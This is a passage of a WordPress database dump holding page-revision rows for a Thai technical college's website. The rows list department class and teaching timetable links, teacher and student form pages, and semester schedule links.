href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%9B%E0%B8%B4%E0%B9%82%E0%B8%95%E0%B8%A3%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5/\">แผนกวิชาปิโตรเคมี</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2/\">แผนกวิชาเคมีอุตสาหกรรม</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5%E0%B8%A2%E0%B8%B2%E0%B8%87/\">แผนกวิชาเทคโนโลยียาง</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B8%99%E0%B8%B4%E0%B8%84%E0%B8%9E%E0%B8%B7%E0%B9%89/\">แผนกวิชาเทคนิคพื้นฐาน</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาบริหารธุรกิจ</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9A%E0%B8%B1%E0%B8%8D%E0%B8%8A%E0%B8%B5/\">แผนกวิชาการบัญชี</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%95%E0%B8%A5%E0%B8%B2%E0%B8%94-%E0%B8%81%E0%B8%B2/\">แผนกวิชาการตลาด/การจัดการธุรกิจค้าปลีก</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A5%E0%B8%82%E0%B8%B2%E0%B8%99%E0%B8%B8/\">แผนกวิชาการเลขานุการ/การจัดการสำนักงาน</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD/\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3/\">แผนกวิชาการจัดการโลจิสติกส์</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาคหกรรม</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1%E0%B8%A8%E0%B8%B2%E0%B8%AA/\">แผนกวิชาคหกรรมศาสตร์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%AD%E0%B8%B2%E0%B8%AB%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B9%82/\">แผนกวิชาอาหารและโภชนาการ</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาอุตสาหกรรมท่องเที่ยว</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%97%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B9%80%E0%B8%97/\">แผนกวิชาการท่องเที่ยว</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%82%E0%B8%A3%E0%B8%87%E0%B9%81%E0%B8%A3%E0%B8%A1/\">แผนกวิชาการโรงแรม</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\">ประเภทวิชาเทคโนโลยีสารสนเทศและการสื่อสาร</span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%B2%E0%B8%82%E0%B8%B2%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5/\">สาขาวิชาเทคโนโลยีสารสนเทศ</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>แผนกวิชาสามัญสัมพันธ์</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%A7%E0%B8%B4%E0%B8%97%E0%B8%A2%E0%B8%B2%E0%B8%A8%E0%B8%B2%E0%B8%AA%E0%B8%95/\">หมวดวิชาวิทยาศาสตร์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%93%E0%B8%B4%E0%B8%95%E0%B8%A8%E0%B8%B2%E0%B8%AA%E0%B8%95%E0%B8%A3/\">หมวดวิชาคณิตศาสตร์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%A0%E0%B8%B2%E0%B8%A9%E0%B8%B2%E0%B8%95%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%9B/\">หมวดวิชาภาษาต่างประเทศ</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%AA%E0%B8%B1%E0%B8%87%E0%B8%84%E0%B8%A1%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9/\">หมวดวิชาสังคมศึกษา</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%A0%E0%B8%B2%E0%B8%A9%E0%B8%B2%E0%B9%84%E0%B8%97%E0%B8%A2/\">หมวดวิชาภาษาไทย</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%9E%E0%B8%A5%E0%B8%B2%E0%B8%99%E0%B8%B2%E0%B8%A1%E0%B8%B1%E0%B8%A2/\">หมวดวิชาพลานามัย</a></p>', 'ตารางเรียน-ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-05-06 22:51:57', '2018-05-06 15:51:57', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(2326, 4, '2018-05-06 22:52:17', '2018-05-06 15:52:17', '<h2><span style=\"color: #333399;\">เอกสารเผยแพร่</span></h2>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"http://www.technicrayong.ac.th/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%84%E0%B8%A3%E0%B8%B9/\">ตารางเรียน-ตารางสอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"></pre>\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/wp-admin/post.php?post=2169&action=edit\">คู่มือพัฒนาการเรียนการสอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-gF\">แบบฟอร์มสำหรับครูผู้สอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a></span></pre>\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-05-06 22:52:17', '2018-05-06 15:52:17', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(2327, 4, '2018-05-06 22:53:26', '2018-05-06 15:53:26', '<h2><span style=\"color: #333399;\">เอกสารเผยแพร่</span></h2>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%84%E0%B8%A3%E0%B8%B9/\">ตารางเรียน-ตารางสอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/wp-admin/post.php?post=2169&action=edit\">คู่มือพัฒนาการเรียนการสอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-gF\">แบบฟอร์มสำหรับครูผู้สอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a></span></pre>\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-05-06 22:53:26', '2018-05-06 15:53:26', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(2330, 4, '2018-05-06 22:57:15', '2018-05-06 15:57:15', '<pre><strong><span style=\"color: #ff0000;\">ประเภทวิชาอุตสาหกรรม</span></strong></pre>\r\n\r\n<hr />\r\n\r\n \r\n\r\n \r\n<p style=\"padding-left: 30px;\"><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C-%E0%B9%80%E0%B8%97%E0%B8%84%E0%B8%99%E0%B8%B4%E0%B8%84/\">แผนกวิชาช่างยนต์/เทคนิคเครื่องกล</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%A5%E0%B9%82%E0%B8%A3%E0%B8%87/\">แผนกวิชาช่างกลโรงงาน/เทคนิคการผลิต</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD/\">แผนกวิชาช่างเชื่อมโลหะ/เทคนิคโลหะ</a></span></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%84%E0%B8%9F%E0%B8%9F%E0%B9%89%E0%B8%B2/\">แผนกวิชาช่างไฟฟ้ากำลัง</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87/\">แผนกวิชาช่างอิเล็กทรอนิกส์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3/\">แผนกวิชาช่างก่อสร้าง</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7/\">แผนกวิชาเครื่องมือวัดและควบคุม</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%9B%E0%B8%B4%E0%B9%82%E0%B8%95%E0%B8%A3%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5/\">แผนกวิชาปิโตรเคมี</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2/\">แผนกวิชาเคมีอุตสาหกรรม</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5%E0%B8%A2%E0%B8%B2%E0%B8%87/\">แผนกวิชาเทคโนโลยียาง</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B8%99%E0%B8%B4%E0%B8%84%E0%B8%9E%E0%B8%B7%E0%B9%89/\">แผนกวิชาเทคนิคพื้นฐาน</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาบริหารธุรกิจ</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9A%E0%B8%B1%E0%B8%8D%E0%B8%8A%E0%B8%B5/\">แผนกวิชาการบัญชี</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%95%E0%B8%A5%E0%B8%B2%E0%B8%94-%E0%B8%81%E0%B8%B2/\">แผนกวิชาการตลาด/การจัดการธุรกิจค้าปลีก</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A5%E0%B8%82%E0%B8%B2%E0%B8%99%E0%B8%B8/\">แผนกวิชาการเลขานุการ/การจัดการสำนักงาน</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD/\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3/\">แผนกวิชาการจัดการโลจิสติกส์</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาคหกรรม</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1%E0%B8%A8%E0%B8%B2%E0%B8%AA/\">แผนกวิชาคหกรรมศาสตร์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%AD%E0%B8%B2%E0%B8%AB%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B9%82/\">แผนกวิชาอาหารและโภชนาการ</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาอุตสาหกรรมท่องเที่ยว</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%97%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B9%80%E0%B8%97/\">แผนกวิชาการท่องเที่ยว</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%82%E0%B8%A3%E0%B8%87%E0%B9%81%E0%B8%A3%E0%B8%A1/\">แผนกวิชาการโรงแรม</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\">ประเภทวิชาเทคโนโลยีสารสนเทศและการสื่อสาร</span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%B2%E0%B8%82%E0%B8%B2%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5/\">สาขาวิชาเทคโนโลยีสารสนเทศ</a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>แผนกวิชาสามัญสัมพันธ์</strong></span></pre>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%A7%E0%B8%B4%E0%B8%97%E0%B8%A2%E0%B8%B2%E0%B8%A8%E0%B8%B2%E0%B8%AA%E0%B8%95/\">หมวดวิชาวิทยาศาสตร์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%93%E0%B8%B4%E0%B8%95%E0%B8%A8%E0%B8%B2%E0%B8%AA%E0%B8%95%E0%B8%A3/\">หมวดวิชาคณิตศาสตร์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%A0%E0%B8%B2%E0%B8%A9%E0%B8%B2%E0%B8%95%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%9B/\">หมวดวิชาภาษาต่างประเทศ</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%AA%E0%B8%B1%E0%B8%87%E0%B8%84%E0%B8%A1%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9/\">หมวดวิชาสังคมศึกษา</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%A0%E0%B8%B2%E0%B8%A9%E0%B8%B2%E0%B9%84%E0%B8%97%E0%B8%A2/\">หมวดวิชาภาษาไทย</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%9E%E0%B8%A5%E0%B8%B2%E0%B8%99%E0%B8%B2%E0%B8%A1%E0%B8%B1%E0%B8%A2/\">หมวดวิชาพลานามัย</a></p>', 'ตารางเรียน-ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-05-06 22:57:15', '2018-05-06 15:57:15', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(2332, 4, '2018-05-06 23:12:16', '2018-05-06 16:12:16', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1c4x-j0d7XBjXqB8PTnA6reTzALVOxY0K\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=10fBODdSELRkQXsXxfaXTlS8YtnUA01xr\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางช่างยนต์/เทคนิคเครื่องกล', '', 'inherit', 'closed', 'closed', '', '2189-revision-v1', '', '', '2018-05-06 23:12:16', '2018-05-06 16:12:16', '', 2189, 